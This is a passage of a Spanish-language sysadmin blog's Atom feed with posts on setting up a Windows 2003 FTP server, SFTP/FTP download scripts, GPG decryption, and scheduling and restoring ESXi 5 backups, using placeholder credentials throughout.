href="http://1.bp.blogspot.com/-9j1fuSVSMNs/Tu9u8T-KEGI/AAAAAAAAAqs/BJIioMegclw/s1600/ScreenHunter_28%2BDec.%2B19%2B12.32.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 156px;" src="http://1.bp.blogspot.com/-9j1fuSVSMNs/Tu9u8T-KEGI/AAAAAAAAAqs/BJIioMegclw/s320/ScreenHunter_28%2BDec.%2B19%2B12.32.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886836824412258" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;No olvidemos destildar las conexiones anonimas:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-ja9ZgBgVER8/Tu9umM5YPhI/AAAAAAAAAqg/E_wAYHtJndU/s1600/ScreenHunter_29%2BDec.%2B19%2B13.12.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://2.bp.blogspot.com/-ja9ZgBgVER8/Tu9umM5YPhI/AAAAAAAAAqg/E_wAYHtJndU/s320/ScreenHunter_29%2BDec.%2B19%2B13.12.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886456968199698" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-y_lGEVPKygc/Tu9ul7d1PXI/AAAAAAAAAqU/Pti6JsQG5Q0/s1600/ScreenHunter_30%2BDec.%2B19%2B13.12.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 302px;" src="http://2.bp.blogspot.com/-y_lGEVPKygc/Tu9ul7d1PXI/AAAAAAAAAqU/Pti6JsQG5Q0/s320/ScreenHunter_30%2BDec.%2B19%2B13.12.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886452289256818" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Limitamos el limite de conexiones segun nuestras necesidades:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-umIaanw_nH4/Tu9ullvagVI/AAAAAAAAAqE/ukH4YQdwTPM/s1600/ScreenHunter_32%2BDec.%2B19%2B13.13.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 302px;" src="http://2.bp.blogspot.com/-umIaanw_nH4/Tu9ullvagVI/AAAAAAAAAqE/ukH4YQdwTPM/s320/ScreenHunter_32%2BDec.%2B19%2B13.13.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886446457422162" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Habilitamos los logs:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-pP7SQipi9To/Tu9ulduTAYI/AAAAAAAAAp4/Wt3Kp0OrCS8/s1600/ScreenHunter_33%2BDec.%2B19%2B13.14.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 278px;" src="http://2.bp.blogspot.com/-pP7SQipi9To/Tu9ulduTAYI/AAAAAAAAAp4/Wt3Kp0OrCS8/s320/ScreenHunter_33%2BDec.%2B19%2B13.14.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886444305252738" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Elegimos el modo de listado de archivos:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-iowlpq-TFvg/Tu9ulI3MpfI/AAAAAAAAApw/bX6Wrz6zeMU/s1600/ScreenHunter_34%2BDec.%2B19%2B13.14.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 298px;" src="http://2.bp.blogspot.com/-iowlpq-TFvg/Tu9ulI3MpfI/AAAAAAAAApw/bX6Wrz6zeMU/s320/ScreenHunter_34%2BDec.%2B19%2B13.14.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886438705440242" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-6608981981960652157?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/jNval-ERgDWxakZtQzSV6fuvc44/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jNval-ERgDWxakZtQzSV6fuvc44/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/jNval-ERgDWxakZtQzSV6fuvc44/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jNval-ERgDWxakZtQzSV6fuvc44/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/iRaWVVUpijs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/6608981981960652157/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=6608981981960652157" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6608981981960652157?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6608981981960652157?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/iRaWVVUpijs/ftp-server-en-windows-2003.html" title="FTP Server en Windows 2003" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-72w3GY932NI/Tu9vznGdYaI/AAAAAAAAAuk/68_wvioY6D8/s72-c/ScreenHunter_06%2BDec.%2B19%2B11.46.gif" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/ftp-server-en-windows-2003.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0MGRXk6cSp7ImA9WhRWFkU.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-3639011934965340374</id><published>2011-12-16T05:48:00.001-08:00</published><updated>2012-01-04T04:50:24.719-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-04T04:50:24.719-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Scripts" /><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><title>Script para descargar de un FTP</title><content type="html">&lt;blockquote&gt;#!/usr/bin/expect -f&lt;br /&gt;spawn sftp usuario@servidorSFTP&lt;br /&gt;expect "password:"&lt;br /&gt;send "acaVaLaPass\n"&lt;br /&gt;set timeout 60&lt;br /&gt;expect "sftp&gt;"&lt;br /&gt;send "cd /ruta/del/ftp\n"&lt;br /&gt;expect "sftp&gt;"&lt;br /&gt;send "lcd /ruta/local/de/mi/equipo\n"&lt;br /&gt;expect "sftp&gt;"&lt;br /&gt;send "mget *.*\n"&lt;br /&gt;expect "sftp&gt;"&lt;br /&gt;send "exit\n"&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tambien podriamos utilizar el ncftpget, como muestra el siguiente script:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;#!/bin/bash&lt;br /&gt;/usr/bin/ncftpget -u miUsuarioFTP -p miPassword ftp.mi-dominio.com.ar /home/ruta/server/local/ /ruta/servidor/ftp/remoto/*&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-3639011934965340374?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/AW5jXih9YLSePyPRbHg5mi3hv9Q/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/AW5jXih9YLSePyPRbHg5mi3hv9Q/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/AW5jXih9YLSePyPRbHg5mi3hv9Q/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/AW5jXih9YLSePyPRbHg5mi3hv9Q/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/G80c9P0LrcE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/3639011934965340374/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=3639011934965340374" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/3639011934965340374?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/3639011934965340374?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/G80c9P0LrcE/script-para-descargar-de-un-ftp.html" title="Script para descargar de un FTP" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/script-para-descargar-de-un-ftp.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CE8ARXw8fyp7ImA9WhRXEEk.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-5630502342826018238</id><published>2011-12-16T05:34:00.000-08:00</published><updated>2011-12-16T05:40:44.277-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-16T05:40:44.277-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Scripts" /><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><title>Desencriptar con GPG en Linux</title><content type="html">&lt;span style="font-weight:bold;"&gt;Les dejo un simple script de ejemplo de como utilizar GPG para desencriptar los archivos que nos envia la gente de PagoFacil con los pagos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;#!/bin/sh&lt;br /&gt;/usr/bin/gpg --no-tty --passphrase "Aca va una passphrase" --decrypt /ruta-FileOrigen/PF`date +%d%m%y`.pgp &gt; /rutaFileDestino/PF`date +%d%m%y`.txt&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-5630502342826018238?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/BJeW6xvX6R1mYrqPock6hfYLq0I/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BJeW6xvX6R1mYrqPock6hfYLq0I/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/BJeW6xvX6R1mYrqPock6hfYLq0I/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BJeW6xvX6R1mYrqPock6hfYLq0I/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/ySMYOgqCgr0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/5630502342826018238/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=5630502342826018238" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/5630502342826018238?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/5630502342826018238?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/ySMYOgqCgr0/desencriptar-con-gpg-en-linux.html" title="Desencriptar con GPG en Linux" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/desencriptar-con-gpg-en-linux.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CE8HSHg4fip7ImA9WhRXEEk.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-260275672822673740</id><published>2011-12-15T06:35:00.000-08:00</published><updated>2011-12-16T05:40:39.636-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-16T05:40:39.636-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Scripts" /><title>Ejecutar backup de ESXi remoto con tarea programada en Windows</title><content type="html">&lt;strong&gt;Uso:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;C:\&gt; plink -ssh -pw nuestro_password  usuario_poder@ipservidor_esxi&lt;br /&gt;/ruta_archivo.sh/archivo.sh&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Ejemplos:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;C:\&gt; plink -ssh -pw Pass root@192.168.1.101&lt;br /&gt;/vmfs/volumes/datastore1/backup/ghettoVCB.sh&lt;br /&gt;&lt;br /&gt;C:\&gt; plink -ssh -pw Pass root@192.168.1.101&lt;br /&gt;/vmfs/volumes/4e412912-b49b42f8-f118238ea7289cfa7e/script_bk/ghettoVCB.sh&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Fuente:&lt;/strong&gt; &lt;a href="http://lalegiondeyoda.wordpress.com/"&gt;La Legion de Yoda´s Blog&lt;br /&gt;&lt;br /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-260275672822673740?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Lfj1lrJGClDxZnGH-jdn4Cl6U-k/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Lfj1lrJGClDxZnGH-jdn4Cl6U-k/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Lfj1lrJGClDxZnGH-jdn4Cl6U-k/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Lfj1lrJGClDxZnGH-jdn4Cl6U-k/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/Qs8beopNVVw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/260275672822673740/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=260275672822673740" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/260275672822673740?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/260275672822673740?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/Qs8beopNVVw/ejecutar-backup-de-esxi-remoto-con.html" title="Ejecutar backup de ESXi remoto con tarea programada en Windows" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/ejecutar-backup-de-esxi-remoto-con.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C04MSHs4cCp7ImA9WhRQGUw.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-8046800574889176960</id><published>2011-12-14T16:09:00.000-08:00</published><updated>2011-12-14T17:19:49.538-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-14T17:19:49.538-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Scripts" /><category scheme="http://www.blogger.com/atom/ns#" term="Virtualización" /><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><title>Crontab ESXi 5</title><content type="html">&lt;span style="font-weight:bold;"&gt;Editamos el cron de root para automatizar el backup con el ghetto:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;# vi /var/spool/cron/crontabs/root&lt;br /&gt; #min hour day mon dow command&lt;br /&gt; 0    0    1   *   * /vmfs/volumes/datastoreBkup/lamw-ghettoVCB-518cef7/ghettoVCB.sh -f /vmfs/volumes/datastore/lamw-ghettoVCB-518cef7/vms_to_backup &gt; /vmfs/volumes/datastore/ghetto-bk-$(date +%Y-%m-%d).log&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Matamos el cron:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;# kill $(cat /var/run/crond.pid)&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Lo volvemos a iniciar:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;# busybox crond&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Ahora bien si reiniciamos el server desaparece del cron, demos agregar la linea persistente agregandola en el rc.local:&lt;/span&gt;&lt;br /&gt;&lt;blockquote&gt;# vi /etc/rc.local&lt;br /&gt; /bin/kill $(cat /var/run/crond.pid)&lt;br /&gt; /bin/echo "0    0    1   *   *   /vmfs/volumes/datastoreBkup/lamw-ghettoVCB-518cef7/ghettoVCB.sh -f /vmfs/volumes/datastoreBkup/lamw-ghettoVCB-518cef7/vms_to_backup &gt; /vmfs/volumes/datastoreBkup/ghetto-bk-$(date +%Y-%m-%d).log" &gt;&gt; /var/spool/cron/crontabs/root&lt;br /&gt; /bin/busybox crond&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Fuente:&lt;/span&gt; &lt;a href="http://communities.vmware.com/docs/DOC-8760"&gt;VMware Communities&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Como nunca me acuerdo donde está la ruta del cron de root en ESXi 5 me hice un propio script como el crontab de linux, les dejo el código:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;#!/bin/sh&lt;br /&gt;# Script Crontab por Morsa&lt;br /&gt;if [ $# = 1 ]&lt;br /&gt;then&lt;br /&gt;        if [ $1 = "-e" ]&lt;br /&gt;        then&lt;br /&gt;                vi /var/spool/cron/crontabs/root&lt;br /&gt;        else&lt;br /&gt;                if [ $1 = "-l" ]&lt;br /&gt;                then&lt;br /&gt;                        cat /var/spool/cron/crontabs/root&lt;br /&gt;                else&lt;br /&gt;                        echo "Error de comando, para obtener ayuda ejecute: crontab sin parámetros"&lt;br /&gt;                fi&lt;br /&gt;        fi&lt;br /&gt;else&lt;br /&gt;        echo "crontab: opción errónea&lt;br /&gt;crontab - crontab for ESXi by Morsa - Ver. 1.0&lt;br /&gt;&lt;br /&gt;USO:  crontab [ -l | -e ]&lt;br /&gt;  Parámetro   Descripción&lt;br /&gt;    -e          Edita el crontab&lt;br /&gt;    -l          Lista contenido del crontab"&lt;br /&gt;&lt;br /&gt;echo "&lt;br /&gt;Visite www.redes-seguridad.com.ar, errores enviar a tirher@gmail.com"&lt;br /&gt;fi&lt;br /&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-8046800574889176960?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/wE5y-SBQqEy7a2Y5izm6VNFQlrE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wE5y-SBQqEy7a2Y5izm6VNFQlrE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/wE5y-SBQqEy7a2Y5izm6VNFQlrE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wE5y-SBQqEy7a2Y5izm6VNFQlrE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/gsIeDiYPoI0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/8046800574889176960/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=8046800574889176960" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/8046800574889176960?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/8046800574889176960?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/gsIeDiYPoI0/crontab-esxi-5.html" title="Crontab ESXi 5" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/crontab-esxi-5.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkMGRHs6eip7ImA9WhRQGEo.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-1054721529711234330</id><published>2011-12-13T14:56:00.000-08:00</published><updated>2011-12-14T05:47:05.512-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-14T05:47:05.512-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Virtualización" /><title>Backup de Configuración de ESXi 5</title><content type="html">&lt;strong&gt;Backupear la config del host:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;C:\Documents and Settings\morsa&gt;"C:\Program Files\VMware\VMware vSphere CLI\bi&lt;br /&gt;n\vicfg-cfgbackup.pl" --save --server 192.168.1.100 --username root --password Pass_de_root Nombre_archivo.bak&lt;br /&gt;Saving firmware configuration to nombre_archivo.bak&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Restaurar la configuración:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;C:\Documents and Settings\morsa&gt;"C:\Program Files\VMware\VMware vSphere CLI\bi&lt;br /&gt;n\vicfg-cfgbackup.pl" --load --server 192.168.1.100 --username root --password Pass_de_root Nombre_archivo.bak&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Reiniciar luego del restore!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Se backupean los siguientes archivos:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;etc/sfcb/repository/root/interop/cim_indicationsubscription.idx&lt;br /&gt;etc/sfcb/repository/root/interop/cim_listenerdestinationcimxml.idx&lt;br /&gt;etc/sfcb/repository/root/interop/cim_indicationhandlercimxml.idx&lt;br /&gt;etc/sfcb/repository/root/interop/cim_indicationfilter.idx&lt;br /&gt;etc/sysconfig/network&lt;br /&gt;etc/shadow&lt;br /&gt;etc/resolv.conf&lt;br /&gt;etc/random-seed&lt;br /&gt;etc/passwd&lt;br /&gt;etc/ntp.drift&lt;br /&gt;etc/ntp.conf&lt;br /&gt;etc/inetd.conf&lt;br /&gt;etc/hosts&lt;br /&gt;etc/group&lt;br /&gt;etc/dropbear/dropbear_rsa_host_key&lt;br /&gt;etc/dropbear/dropbear_dss_host_key&lt;br /&gt;etc/chkconfig.db&lt;br /&gt;etc/vmware/vmware.lic&lt;br /&gt;etc/vmware/ssl/rui.key&lt;br /&gt;etc/vmware/ssl/rui.crt&lt;br /&gt;etc/vmware/snmp.xml&lt;br /&gt;etc/vmware/locker.conf&lt;br /&gt;etc/vmware/license.cfg&lt;br /&gt;etc/vmware/esx.conf&lt;br /&gt;etc/vmware/hostd/vmInventory.xml&lt;br /&gt;etc/vmware/hostd/vmAutoStart.xml&lt;br /&gt;etc/vmware/hostd/pools.xml&lt;br /&gt;etc/vmware/hostd/hostsvc.xml&lt;br /&gt;etc/vmware/hostd/config.xml&lt;br /&gt;etc/vmware/hostd/authorization.x&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-1054721529711234330?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KfjWeJss6qpwC_20POm2LxxS67Q/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KfjWeJss6qpwC_20POm2LxxS67Q/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/KfjWeJss6qpwC_20POm2LxxS67Q/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KfjWeJss6qpwC_20POm2LxxS67Q/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/oiXUbrcxHbY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/1054721529711234330/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=1054721529711234330" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/1054721529711234330?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/1054721529711234330?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/oiXUbrcxHbY/backup-de-configuracion-de-esxi-5.html" title="Backup de Configuración de ESXi 5" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/backup-de-configuracion-de-esxi-5.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE8BQHs6eCp7ImA9WhRQF0k.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-3035096665637653797</id><published>2011-12-12T19:14:00.001-08:00</published><updated>2011-12-12T19:27:31.510-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-12T19:27:31.510-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Virtualización" /><title>Agregar nuevo disco VMware ESXi 5</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-Y-1p2KcUEbg/TubDRSEGViI/AAAAAAAAAj0/JatxsuaYDc4/s1600/01.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 109px;" src="http://4.bp.blogspot.com/-Y-1p2KcUEbg/TubDRSEGViI/AAAAAAAAAj0/JatxsuaYDc4/s320/01.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685446281276053026" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-f6uzkOk28vM/TubDRo9j5gI/AAAAAAAAAkE/3HGFVb3kW20/s1600/02.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 131px;" src="http://2.bp.blogspot.com/-f6uzkOk28vM/TubDRo9j5gI/AAAAAAAAAkE/3HGFVb3kW20/s320/02.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685446287422645762" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try 